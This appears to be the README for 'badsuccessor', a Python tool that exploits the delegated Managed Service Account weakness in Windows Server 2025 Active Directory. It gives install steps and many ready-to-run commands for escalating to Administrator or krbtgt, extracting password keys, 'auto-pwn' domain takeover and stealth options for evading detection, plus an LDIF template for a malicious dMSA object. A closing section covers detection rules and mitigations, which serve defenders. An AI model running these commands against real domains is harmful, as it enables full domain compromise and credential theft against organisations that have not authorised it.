A penetration testing tool that exploits the dMSA (delegated Managed Service Account) privilege escalation vulnerability in Windows Server 2025 Active Directory environments.
This tool is for authorized penetration testing and security research purposes only. Use of this tool against systems without explicit written permission is illegal and unethical. The authors are not responsible for any misuse or damage caused by this tool.
IMPORTANT: This tool is under active development and testing.
- Windows Server 2025 Adoption: As of May 2025, Windows Server 2025 is still in early adoption phase with limited production deployments
- Environmental Variations: Due to the limited number of Windows Server 2025 envi 8000 ronments available for testing, this tool may encounter untested configurations
- Ongoing Development: We are actively refining the tool as more environmental variations are deployed and tested
- Expect Updates: The tool will receive frequent updates as new environment types are tested
- Report Issues: Your feedback is crucial - please report any issues or edge cases you encounter
- Test Carefully: Always test in a non-production environment first
- Schema Variations: Different Windows Server 2025 builds may implement dMSA attributes differently
- Feature Stability: While core functionality is stable, some features may require adjustment for specific environments
- Different Windows Server 2025 build versions
- Schema attribute naming conventions
- Regional/localized AD implementations
- Hybrid cloud configurations
- Various AD functional levels
- Different security hardening configurations
We encourage the security community to:
- Test in diverse environments
- Share findings (sanitized)
- Submit pull requests for compatibility improvements
- Report environmental variations
By using this tool, you acknowledge that it is under active development and may require modifications for your specific environment.
BadSuccessor exploits a privilege escalation vulnerability in Windows Server 2025's delegated Managed Service Account (dMSA) feature. The vulnerability allows attackers with minimal permissions to escalate privileges to any user in the domain, including Domain Administrators.
This tool is based on the excellent research by Yuval Gordon from Akamai Technologies:
The vulnerability exists in the dMSA migration process where:
- An attacker creates a malicious dMSA in any writable OU
- Sets
msDS-ManagedAccountPrecededByLinkorms-DS-Managed-Account-Preceded-By-Linkto point to a target user - Sets
msDS-DelegatedMSAStateorms-DS-Delegated-MSA-Stateto2(migration completed) - The KDC automatically grants the dMSA all privileges of the target user via PAC inheritance
Additionally, the KERB-DMSA-KEY-PACKAGE structure contains the target user's password keys, enabling credential extraction.
- Linux machine (non-domain joined)
- Python 3.6+
- Network access to target Active Directory environment
- Target domain must have at least one Windows Server 2025 Domain Controller
pip3 install ldap3 pyasn1 pycryptodome
pip3 install impacket==0.12.0Note: The tool has been tested with impacket 0.12.0. Version compatibility warnings are displayed at runtime.
# For DNS discovery
pip3 install dnspython
# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2
# RHEL/CentOS/Fedora
sudo yum install krb5-devel- Valid domain credentials (any user account)
- ANY of the following permissions on at least one Organizational Unit:
CreateChildpermissionWritepermissionGenericWritepermissionGenericAllpermission- Member of default groups with write access (e.g., Authenticated Users)
- Tool automatically discovers all writable OUs and shows specific permissions
git clone https://github.com/cybrly/badsuccessor.git
cd badsuccessor
pip3 install -r requirements.txt
chmod +x badsuccessor.pyldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0
python3 badsuccessor.py -d <domain> -u <username> -p <password> [options]# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"# Check Windows Server 2025 schema support
python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema
# Find ALL writable OUs with detailed permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate
# List high-value targets
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets
# Validate specific target account
python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30
# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
--dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
--dmsa-display-name "Production Service"
# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
--dmsa-pattern "svc{random}prod"# Extract credentials for multiple users
python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql
# Auto-pwn mode (fully automated)
python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234
# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID
# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all# Export enumeration results to JSON python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json # Export to CSV python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv # Generate HTML report python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html # Combined operation with exports python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \ --export-json attack_results.json --export-html attack_report.html
| Option | Description |
|---|---|
-d, --domain |
Target domain (e.g., corp.local) [REQUIRED] |
-u, --username |
Username for authentication [REQUIRED] |
-p, --password |
Password for authentication |
--dc-ip |
Domain Controller IP (auto-discover if omitted) |
--ldaps |
Force LDAPS (SSL) connection on port 636 |
| Option | Description |
|---|---|
--attack |
Perform the BadSuccessor attack |
--dry-run |
NEW: Simulate attack without making changes |
--extract-creds |
Extract credentials using key package |
--auto-pwn |
Fully automated domain takeover |
| Option | Description |
|---|---|
--target |
Target user to escalate privileges to |
--targets |
Comma-separated list of users for credential extraction |
--validate-target |
NEW: Validate a target account without attacking |
| Option | Description |
|---|---|
--dmsa-name |
Name for malicious dMSA (auto-generated if not specified) |
--dmsa-pattern |
NEW: Pattern for dMSA naming (e.g., "svc{random}{target}") |
--ou-dn |
Specific OU DN to use (auto-detect if not specified) |
--dmsa-description |
NEW: Description for created dMSA |
--dmsa-display-name |
NEW: Display name for created dMSA |
| Option | Description |
|---|---|
--enumerate |
Enumerate OUs with ANY write permissions |
--list-targets |
List high-value targets |
--check-schema |
Verify Windows Server 2025 schema |
| Option | Description |
|---|---|
--session-id |
Resume existing session |
--list-sessions |
List all available sessions |
--cleanup-session SESSION_ID |
Clean up all dMSAs from a session |
| Option | Description |
|---|---|
--cleanup |
Remove created dMSA |
--dmsa-dn |
dMSA DN for cleanup operations |
--cleanup-all |
NEW: Clean up all dMSAs from current session |
| Option | Description |
|---|---|
--export-json FILE |
NEW: Export results to JSON file |
--export-csv FILE |
NEW: Export results to CSV file |
--export-html FILE |
NEW: Generate HTML report |
--no-banner |
Suppress banner output |
--verbose |
Enable verbose output |
| Option | Description |
|---|---|
--stealth |
Enable stealth mode (innocuous naming) |
--random-delay SECONDS |
Random delay between operations (0-N seconds) |
- Schema Verification: Confirms Windows Server 2025 dMSA support with dynamic attribute detection
- Permission Discovery: Identifies OUs with ANY write access (not just CreateChild)
- Target Validation: NEW - Comprehensive target account analysis before attack
- Dry Run Option: NEW - Test attack viability without making changes
- dMSA Creation: Creates malicious dMSA with customizable attributes
- Attribute Manipulation: Sets predecessor link and migration state with schema awareness
- Session Tracking: NEW - All created objects tracked for easy cleanup
- Kerberos TGT Request: Obtains TGT with inherited privileges
- PAC Analysis: Verifies inherited group memberships
- Key Package Extraction: Enhanced parsing with multiple fallback methods
The tool provides ready-to-use commands for:
- DCSync attacks (dump all domain hashes)
- Remote command execution
- Lateral movement
- Persistence establishment
- Automatically detects which attribute naming convention your environment uses
- Supports all known variations of dMSA attributes
- Fallback mechanisms for different Windows Server 2025 builds
- Pre-attack validation of target accounts
- Detects disabled, locked, or expired accounts
- Warns about smartcard requirements and delegation restrictions
- Provides recommendations based on target properties
- Persistent session tracking across operations
- Resume interrupted attacks
- Bulk cleanup of all created dMSAs
- Session files stored securely with 0700 permissions
- Test attack viability without making any changes
- Validates schema, permissions, and target
- Reports exactly what would happen during a real attack
- Perfect for reconnaissance and planning
- Innocuous dMSA naming patterns that blend in
- Random delays between operations
- Customizable dMSA attributes (description, display name)
- Pattern-based naming with variables
- JSON export for integration with other tools
- CSV export for spreadsheet analysis
- HTML reports with styled output
- Structured data for all operations
- Comprehensive error messages with actionable solutions
- Graceful fallbacks for all operations
- Detailed logging with timestamp and severity
- Verbose mode for troubleshooting
- All features fully implemented (no placeholder code)
- Production-tested code structure
- Modular design with specialized classes
- Full compatibility with various AD configurations
| Event ID | Source | Description |
|---|---|---|
| 5137 | Security | Directory service object creation (dMSA) |
| 5136 | Security | Directory service object modification |
| 2946 | Directory Service | Group Managed Service Account authentication |
| 4768 | Security | Kerberos TGT requested |
| 4769 | Security | Kerberos service ticket requested |
# Splunk Query Example
index=windows EventCode=5137
| where ObjectClass="msDS-DelegatedManagedServiceAccount" OR ObjectClass="ms-DS-Delegated-Managed-Service-Account"
| where NOT user IN ("approved_admins")
# Sigma Rule Example
detection:
selection:
EventID: 5136
AttributeLDAPDisplayName:
- 'msDS-ManagedAccountPrecededByLink'
- 'ms-DS-Managed-Account-Preceded-By-Link'
condition: selection
- Rapid creation and deletion of service accounts
- Non-administrative users creating dMSAs
- Unusual modifications to migration-related attributes
- Service accounts authenticating from unexpected sources
- dMSAs with suspicious naming patterns
-
Restrict OU Permissions
# Remove ALL write permissions from non-admin users Remove-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" -User "Domain Users" -AccessRights CreateChild,Write,GenericWrite,GenericAll # Check for default group permissions Get-ADPermission -Identity "OU=ServiceAccounts,DC=corp,DC=local" | Where-Object {$_.IdentityReference -match "Authenticated Users|Everyone"}
-
Monitor dMSA Operations
# Enable auditing on dMSA attributes (both naming conventions) Set-ADObject -Identity "CN=Schema,CN=Configuration,DC=corp,DC=local" -Add @{ 'msDS-ReplAttributeMetaData' = @('msDS-ManagedAccountPrecededByLink', 'ms-DS-Managed-Account-Preceded-By-Link') }
-
Implement Detection
- Deploy provided detection rules
- Alert on Event ID 2946 with S-1-5-7 caller
- Monitor attribute modifications
- Track dMSA creation patterns
- Apply Microsoft patches when available
- Regular permission audits (check ALL write permissions, not just CreateChild)
- Principle of least privilege enforcement
- Consider disabling dMSA if not required
- Implement approval workflow for service account creation
Based on Akamai's research:
- 91% of environments have vulnerable permissions
- Works on default configurations
- Affects organizations with Windows Server 2025 DCs
- No patches currently available
dn: CN=evil_dmsa,OU=ServiceAccounts,DC=corp,DC=local
objectClass: top
objectClass: msDS-GroupManagedServiceAccount
objectClass: msDS-DelegatedManagedServiceAccount
sAMAccountName: evil_dmsa$
userAccountControl: 4096
# Note: Your environment may use either format below
msDS-ManagedAccountPrecededByLink: CN=Administrator,CN=Users,DC=corp,DC=local
# OR
ms-DS-Managed-Account-Preceded-By-Link: CN=Administrator,CN=Users,DC=corp,DC=local
msDS-DelegatedMSAState: 2
msDS-SupportedEncryptionTypes: 28
The KERB-DMSA-KEY-PACKAGE contains:
- Current keys: dMSA's encryption keys
- Previous keys: Target user's encryption keys (including NTLM hash)
- Enables direct credential extraction without password cracking
Contributions are welcome! Please:
- Fork the repository
- Create a feature branch (
git checkout -b feature/enhancement) - Commit changes (
git commit -m 'Add new feature') - Push to branch (
git push origin feature/enhancement) - Submit a Pull Request
- Follow PEP 8 style guide
- Add unit tests for new features
- Update documentation
- Test against multiple AD environments
- Test with different schema attribute naming conventions
- Ensure all features are production-ready (no placeholders)
- NEW: Dry run mode for safe attack simulation
- NEW: Comprehensive session management with state persistence
- NEW: Target account validation with detailed analysis
- NEW: Export capabilities (JSON, CSV, HTML)
- NEW: Stealth mode with innocuous naming patterns
- NEW: Customizable dMSA attributes (description, display name)
- NEW: Pattern-based dMSA naming with variables
- NEW: Random delay support for stealth operations
- NEW: Dynamic schema attribute detection
- NEW: Enhanced key package parsing with fallbacks
- NEW: Bulk cleanup operations
- NEW: Professional error handling and logging
- IMPROVED: Complete modular architecture
- IMPROVED: Version checking for dependencies
- FIXED: All placeholder code replaced with full implementations
- FIXED: Resolved impacket import issues (removed seq_decode dependency)
- FIXED: Compatible with impacket 0.12.0
- FEATURE: Added support for both dMSA attribute naming conventions
- IMPROVED: Better error handling for import failures
- IMPROVED: More robust schema detection
- MAJOR: Enhanced ACL permission checking - now detects ALL write permissions
- MAJOR: Added support for default groups (Authenticated Users, Everyone, etc.)
- FIXED: Removed all placeholder code
- FIXED: Complete implementation of all features
- IMPROVED: Better error handling and informative output
- IMPROVED: More comprehensive OU enumeration (includes containers)
- FEATURE: Shows exact permissions for each discovered OU
- FEATURE: Detects protected users and delegation restrictions
- Major: Full Kerberos authentication implementation
- Major: KERB-DMSA-KEY-PACKAGE extraction for credential theft
- Major: Basic ACL permission checking
- Major: Windows Server 2025 schema verification
- Feature: Mass credential extraction mode
- Feature: Auto-pwn for automated domain takeover
- Feature: Enhanced target enumeration
- Feature: Post-exploitation command generation
- Improvement: Better error handling and logging
- Improvement: Production-ready code structure
- Original Akamai Research
- GitHub Issue #1 - Enhanced Permission Checking
- GitHub Issue #2 - Schema Attribute Naming
- Microsoft Security Response Center
- Some environments may use different attribute naming conventions (handled by dynamic detection)
- Hash authentication requires password for initial implementation
- Some environments may require manual Kerberos configuration
- Detection rules need customization per environment
If you encounter import errors with impacket:
# Ensure you have the correct version
pip3 uninstall impacket
pip3 install impacket==0.12.0
# Check version
python3 -c "import impacket; print(impacket.__version__)"The tool now includes dynamic schema detection. If it still fails:
# On Domain Controller - Check actual attribute names
Get-ADObject -Filter {name -like "*delegated*" -or name -like "*preceded*"} -SearchBase "CN=Schema,CN=Configuration,DC=corp,DC=local" | Select NameUse the new dry-run mode to test:
# Test without making changes
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Check your exact permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --verbose# List sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Clean up stale sessions
rm -rf /tmp/.badsuccessor_sessions/For questions, issues, or responsible disclosure:
- Open a GitHub Issue
- Follow responsible disclosure practices
- Allow 90 days for patch development
β‘ Remember: With great power comes great responsibility. Always obtain proper authorization before testing! π